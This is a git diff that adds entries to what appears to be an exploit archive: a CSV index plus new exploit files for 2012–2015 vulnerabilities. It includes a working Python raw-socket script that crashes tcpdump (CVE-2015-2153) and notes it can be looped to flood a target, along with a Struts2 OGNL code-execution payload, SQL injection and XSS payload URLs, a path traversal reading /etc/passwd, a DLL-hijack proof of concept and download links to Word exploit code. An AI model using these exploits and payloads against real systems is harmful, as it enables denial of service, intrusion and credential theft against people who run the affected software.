diff --git a/files.csv b/files.csv index 000363a36..fc006c9d7 100755 --- a/files.csv +++ b/files.csv @@ -33976,3 +33976,19 @@ id,file,description,date,author,platform,type,port 37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service Vulnerability",2012-08-20,Dark-Puzzle,windows,dos,0 37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting Vulnerability",2012-08-21,Mr.0c3aN,php,webapps,0 37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross Site Scripting Vulnerability",2012-08-18,"Stefan Schurtz",php,webapps,0 +37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest <= 8.0 Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 +37644,platforms/php/webapps/37644.txt,"Jara 1.6 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 +37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 +37646,platforms/php/webapps/37646.txt,"Banana Dance Cross Site Scripting and SQL Injection Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 +37647,platforms/multiple/remote/37647.txt,"Apache Struts2 Skill Name Remote Code Execution Vulnerability",2012-08-23,kxlzx,multiple,remote,0 +37648,platforms/php/webapps/37648.txt,"Joomla! CiviCRM Component Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0 +37649,platforms/php/webapps/37649.html,"SiNG cms 'password.php' Cross Site Scripting Vulnerability",2012-08-23,LiquidWorm,php,webapps,0 +37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 'p' Parameter SQL Injection Vulnerability",2012-08-22,kallimero,php,webapps,0 +37651,platforms/php/webapps/37651.html,"Monstra Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 +37652,platforms/php/webapps/37652.txt,"KindEditor 'name' Parameter Cross Site Scripting Vulnerability",2012-08-23,LiquidWorm,php,webapps,0 +37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin Arbitrary File Upload Vulnerability",2012-08-22,Crim3R,php,webapps,0 +37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin Arbitrary File Upload Vulnerability",2012-08-22,Crim3R,php,webapps,0 +37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 +37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include Vulnerability",2012-08-23,"Corrado Liotta",php,webapps,0 +37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution Vulnerability",2015-07-20,"Eduardo Braun Prado",windows,local,0 +37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0 diff --git a/platforms/linux/dos/37663.txt b/platforms/linux/dos/37663.txt new file mode 100755 index 000000000..4b7138577 --- /dev/null +++ b/platforms/linux/dos/37663.txt @@ -0,0 +1,113 @@ +# Exploit Title: TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service +# Date: 7.18.2015 +# Exploit Author: Luke Arntson arntsonl@gmail.com +# Vendor Homepage: http://www.tcpdump.org/ +# Software Link: http://www.tcpdump.org/ +# Version: 4.6.2, 4.5.1, 4.4.0 +# Tested on: Lubuntu 14.04 64-bit +# CVE : CVE-2015-2153 + +# Note: tcpdump must be running in verbose mode for this Denial-of-Service to trigger. + +import socket, sys +from struct import * + +def checksum(msg): + s = 0 + for i in range(0, len(msg), 2): + w = ord(msg[i]) + (ord(msg[i+1]) << 8 ) + s = s + w + s = (s>>16) + (s & 0xffff); + s = s + (s >> 16); + s = ~s & 0xffff + return s + +if len(sys.argv) != 3: + print "Usage: ./CVE-2015-2153.py " + exit() + +# fake the source and destination +source_ip = sys.argv[1] +dest_ip = sys.argv[2] + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) +except socket.error , msg: + print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] + sys.exit() + +packet = '' + +# ip header fields +ip_ihl = 5 +ip_ver = 4 +ip_tos = 0 +ip_tot_len = 0 # kernel will fill the correct total length +ip_id = 54321 #Id of this packet +ip_frag_off = 0 +ip_ttl = 255 +ip_proto = socket.IPPROTO_TCP +ip_check = 0 # kernel will fill the correct checksum +ip_saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to +ip_daddr = socket.inet_aton ( dest_ip ) + +ip_ihl_ver = (ip_ver << 4) + ip_ihl + +ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, ip_proto, ip_check, ip_saddr, ip_daddr) + +# tcp header fields +tcp_source = 255 # source port +tcp_dest = 323 # destination port +tcp_seq = 454 +tcp_ack_seq = 0 +tcp_doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes +#tcp flags +tcp_fin = 0 +tcp_syn = 1 +tcp_rst = 0 +tcp_psh = 0 +tcp_ack = 0 +tcp_urg = 0 +tcp_window = socket.htons (5840) # maximum allowed window size +tcp_check = 0 +tcp_urg_ptr = 0 + +tcp_offset_res = (tcp_doff << 4) + 0 +tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5) + +tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr) + +# CVE-2015-2153 out-of-bounds occurs here, when we send in a bad message length to the error type. +# The RPKI pdu looks like the following +# [ pdu version ] [ pdu type ] [ error id ] [ packet length ] [ encapsulated pdu length ] [ message length ] [ message ] +# by giving message length a long value, we cause the buffer to write into bad memory +error_pdu = '\x41' # fake version +error_pdu = error_pdu + '\x0A' # error type +error_pdu = error_pdu + '\x00\x01' # error number +error_pdu = error_pdu + '\x00\x00\x00\x08' # must be less than or equal to total packet length +error_pdu = error_pdu + '\x00\x00\x00\x00' # no encapsulated pdu +error_pdu = error_pdu + '\x7F\xFF\xFF\xFF' # overwrite out-of-bounds '\0', causing DoS +error_pdu = error_pdu + 'AAAA' # fake message + +user_data = error_pdu + +# pseudo header fields +source_address = socket.inet_aton( source_ip ) +dest_address = socket.inet_aton(dest_ip) +placeholder = 0 +protocol = socket.IPPROTO_TCP +tcp_length = len(tcp_header) + len(user_data) + +psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length); +psh = psh + tcp_header + user_data; + +tcp_check = checksum(psh) + +# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order +tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr) + +# final full packet - syn packets dont have any data +packet = ip_header + tcp_header + user_data + +#Send the packet finally - the port specified has no effect +s.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target diff --git a/platforms/multiple/remote/37647.txt b/platforms/multiple/remote/37647.txt new file mode 100755 index 000000000..9b6b5660b --- /dev/null +++ b/platforms/multiple/remote/37647.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/55165/info + +Apache Struts2 is prone to a remote-code-execution vulnerability because it fails to sufficiently sanitize user-supplied input. + +Attackers can exploit this issue to execute arbitrary code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} \ No newline at end of file diff --git a/platforms/php/webapps/37643.txt b/platforms/php/webapps/37643.txt new file mode 100755 index 000000000..04eccb903 --- /dev/null +++ b/platforms/php/webapps/37643.txt @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/55125/info + +IBM Rational ClearQuest is prone to the following security vulnerabilities: + +1. An HTML-injection vulnerability. + +2. Multiple information-disclosure vulnerabilities. + +3. A security-bypass vulnerability. + +Attackers may leverage these issues to obtain potentially sensitive session information, bypass certain security restrictions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. + +The following versions are affected: + +IBM Rational ClearQuest 7.1.x through versions 7.1.2.7 +IBM Rational ClearQuest 8.x through versions 8.0.0.3 + +https://www.example.com/snoop +https://www.example.com/hello +https://www.example.com/ivt/ +https://www.example.com/hitcount +https://www.example.com/HitCount.jsp +https://www.example.com/HelloHTMLError.jsp +https://www.example.com/HelloHTML.jsp +https://www.example.com/HelloVXMLError.jsp +https://www.example.com/HelloVXML.jsp +https://www.example.com/HelloWMLError.jsp +https://www.example.com/HelloWML.jsp +https://www.example.com/cqweb/j_security_check \ No newline at end of file diff --git a/platforms/php/webapps/37644.txt b/platforms/php/webapps/37644.txt new file mode 100755 index 000000000..42e5d4a46 --- /dev/null +++ b/platforms/php/webapps/37644.txt @@ -0,0 +1,58 @@ +source: http://www.securityfocus.com/bid/55145/info + +Jara is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Jara 1.6 is vulnerable; other versions may also be affected. + +SQL Injection Vulnerabilities: + +http://example.com/login.php (POST - username) + +http://example.com/login.php (POST - password) + +http://example.com/admin/delete_page.php?id='%2BNSFTW%2B' + +http://example.com/admin/delete_post.php?id='%2BNSFTW%2B' + +http://example.com/admin/delete_category.php?id='%2BNSFTW%2B' + +http://example.com/admin/delete_user.php?id='%2BNSFTW%2B' + +http://example.com/admin/edit_page.php?id='%2BNSFTW%2B' + +http://example.com/admin/edit_user.php?id='%2BNSFTW%2B' + +http://example.com/admin/edit_post.php (POST - id) + +http://example.com/admin/edit_category.php (POST - id) + + +Cross-site scripting Vulnearbilities: + +http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E + +http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E + +http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E + +http://example.com/login.php (POST - username) + +http://example.com/login.php (POST - password) + +http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E + +http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E + +http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E + +http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E + +http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E + +http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E + +http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E + +http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E diff --git a/platforms/php/webapps/37645.txt b/platforms/php/webapps/37645.txt new file mode 100755 index 000000000..c8a6ebcf8 --- /dev/null +++ b/platforms/php/webapps/37645.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/55147/info + +OrderSys is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +OrderSys 1.6.4 is vulnerable; other versions may also be affected. + +http://example.com/ordering/items.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3 +http://example.com/ordering/vendors.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3&submit_find=Find +http://example.com/ordering/items.php?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0007B1)%3C/script%3E&where_condition=3&order_condition=name%20ASC +http://example.com/ordering/vendors.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) +http://example.com/ordering/items.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) +http://example.com/ordering/orders.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) +http://example.com/ordering/interface_creator/index_short.php?table_name=item&function=details&where_field='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F1)%3C/script%3E&where_value=279 +http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F5B)%3C/script%3E&page=0&order=Name&order_type=DESC +http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F79)%3C/script%3E&order=Name&order_type=DESC +http://example.com/ordering/interface_creator/login.php?function='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F4)%3C/script%3E&go_to=(http%3A%2F%2Fubuntu%2Ftargets%2Fordersys%2Fordering%2Fadmin.php) +http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000902)%3C/script%3E +http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor +http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor +http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC +http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC diff --git a/platforms/php/webapps/37646.txt b/platforms/php/webapps/37646.txt new file mode 100755 index 000000000..bbf293361 --- /dev/null +++ b/platforms/php/webapps/37646.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/55153/info + +Banana Dance is prone to cross-site-scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Banana Dance B.2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000174)%3C/script%3E&category=3 +http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017B)%3C/script%3E&category=3 +http://www.example.com/search.php?q=234&category=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ \ No newline at end of file diff --git a/platforms/php/webapps/37648.txt b/platforms/php/webapps/37648.txt new file mode 100755 index 000000000..7c019f09f --- /dev/null +++ b/platforms/php/webapps/37648.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/55166/info + +The CiviCRM component for Joomla! is prone to multiple arbitrary file-upload vulnerabilities that allows attackers to upload arbitrary files because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +http://www.example.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html + +http://www.example.com/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html + +http://www.example.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html \ No newline at end of file diff --git a/platforms/php/webapps/37649.html b/platforms/php/webapps/37649.html new file mode 100755 index 000000000..0fe5ab3e9 --- /dev/null +++ b/platforms/php/webapps/37649.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55168/info + +SiNG cms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +SiNG cms 2.9.0 is vulnerable; other versions may also be affected. + + SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability
\ No newline at end of file diff --git a/platforms/php/webapps/37650.txt b/platforms/php/webapps/37650.txt new file mode 100755 index 000000000..544ece09c --- /dev/null +++ b/platforms/php/webapps/37650.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55170/info + +1024 CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +1024 CMS 2.1.1 is vulnerable; other versions may also be affected. + +http:// www.example.com/index.php?p=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37651.html b/platforms/php/webapps/37651.html new file mode 100755 index 000000000..4268227a4 --- /dev/null +++ b/platforms/php/webapps/37651.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55171/info + +Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Monstra 1.2.1 is vulnerable; other versions may also be affected. + + Monstra 1.2.1 Multiple HTML Injection Vulnerabilities


\ No newline at end of file diff --git a/platforms/php/webapps/37652.txt b/platforms/php/webapps/37652.txt new file mode 100755 index 000000000..fe690bbb8 --- /dev/null +++ b/platforms/php/webapps/37652.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55172/info + +KindEditor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +KindEditor versions 4.1.2 and 4.0.6 are vulnerable; other versions may also be affected. + +http://www.example.com/kindeditor/index.php?name=
by ZSL!
\ No newline at end of file diff --git a/platforms/php/webapps/37653.txt b/platforms/php/webapps/37653.txt new file mode 100755 index 000000000..b84471f17 --- /dev/null +++ b/platforms/php/webapps/37653.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/55174/info + +The Rich WidgetPlugin for WordPress is prone to an arbitrary file-upload vulnerability. + +An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +http://www.example.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html \ No newline at end of file diff --git a/platforms/php/webapps/37654.txt b/platforms/php/webapps/37654.txt new file mode 100755 index 000000000..2e5ae6c5f --- /dev/null +++ b/platforms/php/webapps/37654.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55175/info + +The Monsters Editor for the WP Super Edit plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +http://www.example.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html + +http://www.example.com/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html \ No newline at end of file diff --git a/platforms/php/webapps/37656.txt b/platforms/php/webapps/37656.txt new file mode 100755 index 000000000..1c0a13d35 --- /dev/null +++ b/platforms/php/webapps/37656.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55189/info + +PHP Web Scripts Ad Manager Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. + +Ad Manager Pro version 4.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd \ No newline at end of file diff --git a/platforms/windows/local/37657.txt b/platforms/windows/local/37657.txt new file mode 100755 index 000000000..5cbe1b834 --- /dev/null +++ b/platforms/windows/local/37657.txt @@ -0,0 +1,20 @@ +Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability +Date: July 15th, 2015 +Exploit Author: Eduardo Braun Prado +Vendor Homepage : http://www.microsoft.com +Version: 2007 +Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1 +CVE: CVE-2015-0097 + +Original Advisory: https://technet.microsoft.com/library/security/ms15-022 + +Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible +to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context +of the local machine zone of Internet Explorer which leads to arbitrary code execution. +By persuading users into opening eg. specially crafted .WPS, ".doc ", ".RTF " (with a space at the end) +it is possible to triggerthe vulnerability and run arbitrary code in the context of the logged on Windows user. + +Exploit code here : + +https://onedrive.live.com/embed?cid=412A36B6D0A9436A&resid=412A36B6D0A9436A%21156&authkey=AA_JVoZcoM5kvOc +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37657.zip \ No newline at end of file diff --git a/platforms/windows/remote/37655.c b/platforms/windows/remote/37655.c new file mode 100755 index 000000000..be5510a24 --- /dev/null +++ b/platforms/windows/remote/37655.c @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/55179/info + +Adobe Pixel Bender Toolkit2 is prone to multiple vulnerabilities that allow attackers execute arbitrary code. + +An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +#include +#define DllExport __declspec (dllexport) + +DllExport void hook_startup() { exp(); } + +int exp() +{ + WinExec("calc", 0); + exit(0); + return 0; +} +